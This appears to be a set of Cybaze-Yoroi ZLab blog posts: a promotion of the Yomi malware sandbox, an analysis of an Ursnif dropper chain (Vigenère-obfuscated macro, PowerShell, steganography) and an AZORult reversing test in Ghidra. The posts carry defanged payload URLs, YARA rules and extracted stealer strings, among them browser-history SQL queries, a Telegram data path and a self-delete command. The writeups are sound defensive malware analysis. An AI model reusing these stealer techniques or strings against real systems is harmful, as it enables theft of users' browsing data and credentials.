With this in mind, few months ago Yoroi decided to actively support this Cause sharing proprietary tools to help the Info-Sec community to detect, analyze and dissect malware threats, opening the “Yomi” sandox to the public: the first completely Italian malware analysis sandbox, today extending access to all the community users.

Figure. “Yomi: The Malware Hunter” main interface

The Malware Hunter

Yomi is a malware sandbox able to digest and detonate malicious documents, executables, installers and scripts in a controlled environment, silently recording each samples actions inside the custom analysis environment designed to defeat evasion techniques, and then spot and track the malicious behaviour hidden by attackers.

Yomi’s malware engine implements a multi-analysis approach able to exploit both: static analysis and behavioural analysis. The static analysis section includes: document and macro code extraction, import, dependencies and trust chain analysis, while behavioural analysis is weaponized to recognizing malicious (or suspicious) actions the malware silently does, giving also a powerful insight on command and control, exfiltration and lateral movement activities over the network. Each analysis is reported  in an intuitive aggregated view to spot interesting patterns at a glance.

Figure. Network connections at a glance

The behavioural detection engine is not only able to detect anomalous, suspicious or malicious actions attempted during the analysis, Yomi has also been designed to help human analysts to understand the dynamic of the malicious code execution, giving detailed visibility of the control flow and interactions the malware performs (“Action Graph”). Yomi technology includes many static and dynamic engines in order to avoid as much as possible Malware evasion.

Figure. Behavioural signatures and action graph example

Yomi can analyse a huge variety of executable file types, ranging from PE32 (Native or .NET) both x86 and x86_64bit, Java binaries, Powershell scripts, JS or VB scripts, Cabinet files, HTML pages, PDF documents, Office Documents such as Powerpoint, Excel or Word files (even the exetic ones) and several common or uncommon compressed archives format ranging

from ZIP, 7z, RAR, TAR, BZ2, up to the ACE format. Yomi provides ad hoc analysis path for each of these file families, leveraging a plethora of security tools to extract much information as possible from each sample. For instance documents and spreadsheets are inspected for macro code or embedded exploits, extracting them from the original file, instead executable files are statically checked to gather contextual info and then instrumented for dynamic analysis, or also Java files, decompiled to ease their manual inspection.

Anyway, stay tuned since we are planning to release many additional features in “Yomi: The Malware Hunter” in the next months.

HTTPS Inspection

Network addresses, domains and patterns are one of the most actionable kinds of indicators a blue team may exploit to spot malicious activity within network perimeter, their relevance can also be appreciated during threat intelligence operations, where they represent some of the basic blocks needed to track threat actors activities.

However, during the years, due to the increasing usage of end to end encryption, attackers started to abuse SSL protected channels to avoid detection, leveraging the limited visibility on these channels to evade IPS and next-gen proxies, enabling them to bypass an important part of the perimetral security controls, leaving the victims in the hand of their last resource: antiviruses. Well known technologies, even by cyber criminals.

Also several automated malware analysis are not equipped to deal with encrypted channels, leaving the effort of the communication inspection to the cyber security analysts. With this in mind, Yoroi choose to empower “Yomi: The Malware Hunter” with SSL inspection capabilities,  for free. A cutting edge feature typically available only in premium services, enabling community malware hunters to analyze even the encrypted tunnels malware code sets up, unveiling their hidden data.

In fact, Yomi supports the Man in the Middle feature, able to force eventual malicious samples under analysis to transit into an ad hoc SSL proxy, instrumented to record and analyze network traffic in transit, giving visibility on encrypted channel to the malware hunters.

Figure. Man in the Middle traffic interception

Private Reports

Figure. Private report submission

Almost all security professional knows not every sample and not every analysis can be shared to the public. Some times, especially during APT investigations, analysis reports cannot be disclosed to the community, at least during the initial phases of the analysis, or, for instance, during take-downs or joint investigation with law enforcement, typically requiring some degree of secretiveness, at least until the conclusion of the operations.

Yoroi intimately understand this privacy need coming from many professionals and decided to empower Yomi of a game changing feature: the opportunity to choose to NOT share the analysis with the community, enabling its users to request private reports for the submitted samples. This means both sample and analysis report too will not be disclosed to the community. A feature many times not available in free tools.

Community and Contests

Figure. Custom tags

“Yomi: The Malware Hunter” is not only a freely available automated analysis tool, it’s designed to engage the community and leverage hunter’s experience, enabling them to tag the submitted samples with names, families and contextual enrichments only a human analyst can afford.

Also, Yomi’s community will have the opportunity to participate in malware contests aimed to spot particular threats or engage the community to gather data and discussion about malware trends spotted in the wild.

Figure. Community context banner

And yes, there also will be a special reward for top submitters and contest participants 😉 .. So, give a try to “Yomi: The Malware Hunter”, join the community and start hunting malware with us!

If you want to try Yomi: The Malware Hunter please register here!

PS: feedbacks and opinions are welcome (check the “Give a feedback” form).

Ursnif: The Latest Evolution of the Most Popular Banking Malware


Few days ago, the researchers of ZLab Yoroi-Cybaze dissected another attack wave of the infamous Ursnif malware, also known as Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. Ursnif/Gozi is active from over a decade and was one of the most active malwares listed in 2017 and 2018. Today it constantly reaches several organization across Italy presenting itself in several ways, for instance as a malicious document delivered through email.

The malware has evolved over time and has added functionality, in fact, apart from collecting  banking credentials it is also able to collect keystrokes, cryptocurrencies, screenshots, webmail, integrating spyware features together with banking Trojans features.

During their investigations, researchers of ZLab Yoroi-Cybaze intercept a new variant of this malware delivered through malspam campaign towards Italian companies. This latest Ursnif variant shows the same modus operandi: a malicious document in which is embedded an highly obfuscated VBA macro that acts as a first stage dropper.

The Ursnif Threat Evolution

According to Microsoft since its appearance in 2009, Ursnif has shown incredible capabilities to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites while remaining more stealthiness as possible. It uses many advanced trick to evade several sandboxes environment and today is the most popular malware spreading in the wild. ZLab researchers have studied many samples in the past to profile the techniques used by the malware, to track its evolution and sophistication over time.

Table 1: Ursnif techniques evolution

First analyzed sample backs to January 2018. That Ursnif variant has delivered through a macro document and consist of a few obfuscated stage and a process hollowing injection technique to execute its payload. After few months, in June 2018, we find evidence that  Ursnif was delivered through Necurs Botnet. The latter is one of the most famous botnets known nowadays and it has been used to deliver this Ursnif variant. The hidden link among necurs and ursnif has been discovered by ZLab researchers as explained in this link. In December 2018, a first shift is about the implementation of many dropper stages, in order to hide the final payload; moreover, in order to execute its payload, the malware does not perform a classical process injection as in the previous samples but an APC injection, not yet seen as payload injection trick used by Ursnif.

The sample spread in February 2019 use two new features: the first one is a several obfuscated powershell stages in order to evade AVs and reduce its detection, the second one is the use of steganography technique. The latter permit to hide code into a legit image manipulating specific bits. Next, another code perform a decryption and execution of malicious code into the victim machine.

In March 2019 another weaponized variant of Ursnif has been detected: in this case, to spread the malicious software, a google drive document combined with an obfuscated VBA Script is used over steganography. The last sample shown in previous table is similar to February’s sample but include another interesting feature: in this case a first VBS stage is encrypted using the Vigenere cipher; this allow to hide its malicious code and evade many sandboxes environment. We are observing a continuous evolution due to several features added in few months, this is an indicator that this malware is still in development and, observing also features fragmentation among variants lets us think, with high confidence, that there are various fork of the same codebase spreading in the wild.

Technical Analysis

Sha 25634669dde1e33ec96147540433f60e90056d38df1e3bb952fdc600e979d74f690
ThreatUrsnif dropper
Descrizione BreveExcel with macro

Table 2: information about Ursnif dropper

The most widespread infection vector observed were the macro enabled office documents, and this variant uses the same technique too. The malicious document looks like an invoice that requires enabling macros in order to proper view its contents.

Figure 1: excel document requiring macro enabling

The whole infection chain begins when the macro is enabled. This Ursnif variant presents a  macro protection technique technique that it’s not present in previous variants, in order to make the analysis hard avoiding manipulation and extraction. After extraction of OLE object inside the document we are able to see the content of macros and their associated name, as shown in the following figure:

Figure 2: macros isolation

Now it is possible to isolate an interesting macro in order to further analyze it in detail. It contains a piece of VBA that was extracted.

Figure 3: VB macro source code

In a different way than the past waves, the malware author added a “VigenereDo” function to decrypt and reconstruct the initial infection step, using an algorithm based on the Vigenère cipher, a classical polyalphabetic cipher.

The resulting command text is obtained combining the obfuscated strings defined in “jeneric” function with other strings (not visible in figure) and after further some manipulations is possible to spot the whole script will be executed. When user enable macros, the “wmic.exe” process run the following code through the “wmic 'PRocesS'   "Call" 'CREATe'” command.

Figure 4: the powershell script (crypted)

So, at this point, several powershell deobfuscation steps occurs. First of all, every value (“${1F}”) defined in the ps string is replaced with content stored into “$1F” variable corresponding to “,” (comma) character. After having replaced these values, the script is run through “iex” primitive invoked by “.($psHomE[4]+$pshOMe[34]+'X')” and next through “( ". ( `$ShELLid[1]+`$shelLID[13]+'X')”. The complete deobfuscated script is the following.

Figure 5:  the first powershell script (decrypted)
Figure 6: image with malicious embedded powershell script

First of all the malware checks the current TimeZone in order to verify if it is set on +01:00.  If true, it download the next stage from “hxxps://i[.]imgur[.]com/TVkWKQa[.]png”. As well as in other recent attacks, the downloaded image hides another powershell stage leveraging steganography techniques.

The malware code iterates over each pixel of the image and through several mathematical binary operation converts grabs the two Least Significant Bits of every byte of the picture, concatenating them with other LSBs to produce a complete Powershell code.

Figure 7: second powershell script extracted from the steganographic image

Et voilà, another URL is found but, before download the next stage from it, the malware perform a further checking in order to evaluate the value returned by “CurrentCulture”.

Figure 8: CurrentCulter verification in powershell

If check is verified, once again through the “IEX” primitive it try to download other components named “ose000000.exe” from “hxxps://nuovalo[.]site/RGI82B3.-tmp-tmp”, saving  it into “%TEMP%” folder. In the following table are shown the information about sample.

Sha 2560f2245eec921949d9a1d8e13cab747a7fbb137aaee3b9ddacee0681c8b2e4fa8
Descrizione BreveFinal payload of Ursnif banking malware

Table 3: information about Ursnif final payload


This latest Ursnif wave keeps showing a complex infection process. The starting point of the entire chain was the usual Visual Basic macro, this time protecting its code with a Vigenère cipher, responsible of the decryption of the additional Powershell stage launched abusing the Windows Management Infrastructure (WMI) functionalities, decoupling it to the original infection tree and then completing the infection chain exploiting steganography techniques to bypass network detection and several environmental check, to ensure the malware is running into expected machines confirming the highly evasive trend of this aggressive malware threat.

Indicator of Compromise




Yara Rules

import "pe"
rule Ursnif_documentDropper_201904 {
	description = "Yara rule for Ursnif loader - April 2019 version"
	author = "Yoroi - ZLab"
	last_updated = "2019-04-02"
	tlp = "white"
	category = "informational"
	$a1 = { 43 6F 77 61 6E 64 43 6F 77 }
	$a2 = { 56 69 67 65 6E 65 72 65 44 6F }
	$b1 = "xlTickLabelPositionNextToAxis" ascii wide

	all of them

rule Ursnif_201904 {
	description = "Yara rule for Ursnif - April 2019 version"
	author = "Yoroi - ZLab"
	last_updated = "2019-04-02"
	tlp = "white"
	category = "informational"
	$a1 = "PECompact2" ascii wide
	all of them and pe.imphash()=="09d0478591d4f788cb3e5ea416c25237"

This blog post was authored by Davide Testa and Antonio Pirozzi of Cybaze-Yoroi Z-LAB

Ghidra SRE: The AZORult Field Test


One of the most anticipated moments in the infosec community during the last few months was, with no doubt, the Ghidra public release. On the 5th of March, at the RSA conference, Ghidra has been presented to the public revealing the inner details of the Software Reverse Engineering (SRE) framework that National Security Agency used for more than a decade.

Its release was a sort of “main event” for security researchers all around the globe, which immediately started exploring its functionalities to find out its place within the reversing tool panorama. Cybaze-Yoroi ZLAB team also decided to play around with it, but this time using a real case study, AZORult: one of the most active threats spreading nowadays, always using new methodologies to avoid detection. For this reason a recent AZORult sample has been chosen to field-test the NSA reverse engineering tool.

Technical Analysis

Size809 KB

The sample is a PE32 file apparently coded in Visual C++, containing references to major IT companies in its metadata fields like Google and Amazon.

Figure 1: Static information about the sample

Dynamically executing the malware, we are able to isolate only a few actions of the malware, because its C2 server wasn’t active at the time of analysis, probably due to a configuration error.

Figure 2: Communication of the malware with the C2

So, after contacting the server, the sample does not have the possibility to download other components and configurations. Thus, the malware kills itself and terminates its execution.  For this reason, we focused the investigation into static analysis and debugging.

Digging into the Sample

The first details about the malware inner workings have been retrieved through the API calls tracing, where some interesting APIs emerged: the malware performs a check on the active processes, finding the typical malware analysis tools, like Wireshark, Process Explorer and Process Monitor.

Figure 3: API logging of the malware

Among the API calls, there is one quite interesting, an OpenProcess call referencing the process itself, referencing an embedded portable executable inside the original file: the payload.

Figure 4: Breakpoint on OpenProcess API allowing payload dump

Reversing the Payload with Ghidra

ThreatAzorult - Payload
Size128 KB

The extracted payload is written in Delphi language, as confirmed with a first preliminary analysis. Thus, we decided to test Ghidra in order to statically analyze the malware.

Figure 6: Static information about the Azorult payload

Using the Ghidra search strings function we found the hardcoded C2 address in plain-text, meaning the malware writers do not bother to protect its payload, but only the container. This IP address is the same was seen during the dynamic analysis section, as shown in Figure 2. Also, the malware uses a custom user-agent.

Figure 7: Communication routine with the C2 and hardcoded address

Then, we managed to gather the characteristic strings of the payload, finding many interesting ones, extensively reported in the section “Configuration Strings”. Thanks to this, we have also isolated the AZORult routine used to gather and store the Mozilla cookies (Figure 8).

Figure 8: Routine for gathering information of Mozilla

Digging further, we identified the “shell routine” which allows the command and control operator to execute arbitrary commands on the victim machine. The code snippet shown in Figure 9 shows how the malware exploits this capability to delete its execution traces into the victim machine.

We also leveraged Ghidra built-in script engines to test Yara rules against the inspected code. This flexibility is one of the main characteristics makes Ghidra a valuable tool for a Reverse Engineer.

Figure 10: Ghidra scripts list

Using the “YaraGhidraGUIScript”, available off-the-shelf in the tool, we managed to write down an ad hoc rule to spot the in-memory payload.

Figure 11: Yara Ghidra GUI script

The usage of this extension is quite intuitive: the analyst has to select the piece of disassembled code he/she consider representative of the malicious behaviour.

Figure 12: Selection of the piece of code to generate the Yara Rule

For instance, the selected piece of code in Figure 12 refers to the routine used by AZORult to contact the C2 with the specific User-Agent. Selecting it into the “YaraGhidraGUIScript”, a new popup forms shows the analyst a powerful Yara generation helper.

Figure 13: GUI of the Ghidra plugin

The Yara GUI shows a smart rule proposal and allows the analyst to freely edit it: in this case the Hex values of the PUSH and MOV operation could be relative to the current virtual addressing of the specific machine, so by clicking on these values, the script replaces the operand values with the wildcard “?”, preserving the assembly instructions.

Figure 14: Refinement of the generated Yara Rule by replacing the operand values with wildcards

The resulting Yara rule is reported the right section “Yara rules” below.


Ghidra is a valuable tool in the arsenal of a Reverse Engineer. It freely provides advanced features like the code decompilation, that was typically available into high end commercial products, accessible to well budgeted professionals. The NSA choice to give back to the security community is admirable, especially because the tool itself is solid and has advanced peculiarities that make it suitable for professional usage.

Anyway, it is not possible to directly compare it to commercial products, or wondering if it may be able to replace any of those, it's conceptually erroneous, and after this field test we can confirm Ghidra is a valuable tool should be included in every reverse engineering’s arsenal.

Indicator of Compromise

Yara Rules

rule Azorult_payload {
  	description = "Yara Rule for Azorult payload"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_03_19"
  	tlp = "white"
  	category = "informational"

		$a1 = { 8B D8 EB 0E 53 E8 03 EA FF FF 8B D0 }
		$a2 = { 33 C0 89 45 F0 85 DB 74 0B 83 EB 04 }
		$a3 = { 50 6A FF 68 74 28 41 00 8B 45 F4 50 }

		// Rule generated through the usage of Ghidra Script
		$STR1 = { 68 ?? ?? ?? ?? ff 55 f0 8b d8 c7 47 10 ?? ?? ?? ?? 90 c7 45 b0 ?? ?? ?? ?? 6a 04 8d 45 b0 50  }
		all of ($a*) or $STR1


SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000
CPU Count: 
Video Info
MachineID : 
EXE_PATH  :   
Windows    :  
Computer(Username) :   
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
/c %WINDIR%\system32\timeout.exe 3 & del "
%appdata%\Telegram Desktop\tdata\

This blog post was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB